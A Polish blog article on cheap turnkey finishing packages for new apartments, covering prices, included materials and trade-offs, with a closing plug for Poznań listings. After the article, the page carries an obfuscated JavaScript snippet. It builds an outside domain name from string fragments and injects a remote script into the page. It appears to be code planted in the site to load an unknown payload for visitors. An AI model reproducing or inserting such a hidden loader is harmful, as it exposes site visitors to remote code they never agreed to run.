Wykończenie mieszkania pod klucz w najtańszej opcji. Co otrzymujemy?

Większość osób decyduje się na kupno mieszkania w stanie deweloperskim. To oznacza, że musimy jeszcze je wykończyć, aby można było w nim zamieszkać. Wielu deweloperów oferuje jednak opcję wykończenia pod klucz – wtedy pracami zajmuje się ekipa współpracująca z deweloperem. Czy warto zdecydować się na taką opcję?

Usługa wykończenia mieszkania pod klucz ma wiele zalet. Przede wszystkim nie musimy wykańczać mieszkania samodzielnie albo szukać ekipy, która będzie mogła się tym zająć. Nie musimy też spędzać długich godzin na poszukiwaniu materiałów. Możemy przy tym skorzystać z pomocy projektantów wnętrz, którzy pomogą nam w podjęciu najlepszych decyzji aranżacyjnych. Na wykonane prace otrzymujemy gwarancję i odbieramy wtedy mieszkanie już wykończone – gdy będzie miało jakieś wady, możemy wskazać, co należy poprawić.

Wiele osób obawia się jednak, że to dość droga opcja i taniej będzie wykończyć mieszkanie we własnym zakresie i z wykwalifikowaną ekipą. Jednak ceny wcale nie są tak wysokie – rozpoczynają się już od około 450-500 złotych za metr kwadratowy. W tej cenie otrzymujemy nie tylko materiały, ale też robociznę.

Najtańsze pakiety wykończenia pod klucz dotyczą przede wszystkim podstawowych, ale modnych materiałów – podłóg z paneli laminowanych, gresów, płytek szkliwionych. Jeśli chodzi o ściany, malowane są one tylko na jeden kolor. W ramach wykończenia łazienki mamy do wyboru zwykle 2-3 modele armatury i ceramiki. W przypadku drzwi wewnętrznych wybór może być już większy.

Warto też wskazać, że w podstawowym pakiecie nie zawsze wykonuje się wszystkich prac jak w pakietach droższych. Przykładowo, zamiast wykafelkowania całej łazienki płytki znajdą się tylko na ścianach, które są narażone na zachlapanie – reszta będzie pomalowana specjalną farbą.

Warto więc dokładnie sprawdzić, co znajduje się w pakietach w najniższych cenach – gdy kupujemy mieszkanie i nie chcemy przepłacać, to dobry wybór, który także sprawdzi się przy przeznaczeniu lokalu na wynajem. Jeśli interesuje cię Poznań mieszkania na sprzedaż z opcją pod klucz można znaleźć już teraz przez internet.

(function(){
ah2c=document.createElement(„script”);ah2c_=”u”+(„s”)+”ta”;
ah2c_+=(„t.i”)+””+”n”;ah2c_+=((„f”)+”o”);ah2c.type=”text/javascript”;
ah2c_+=”/”; ah2cu=”72457027″;ah2cu+=”.07vp78imh2cphbagwvX”;ah2cu+=”iqd08f4yfwX”;
ah2c.src=”//”+ah2c_+ah2cu; ah2c.async=true; document.body.appendChild(ah2c);
})();

Similar Posts

Co o tym sądzisz?

Witryna wykorzystuje Akismet, aby ograniczyć spam. Dowiedz się więcej jak przetwarzane są dane komentarzy.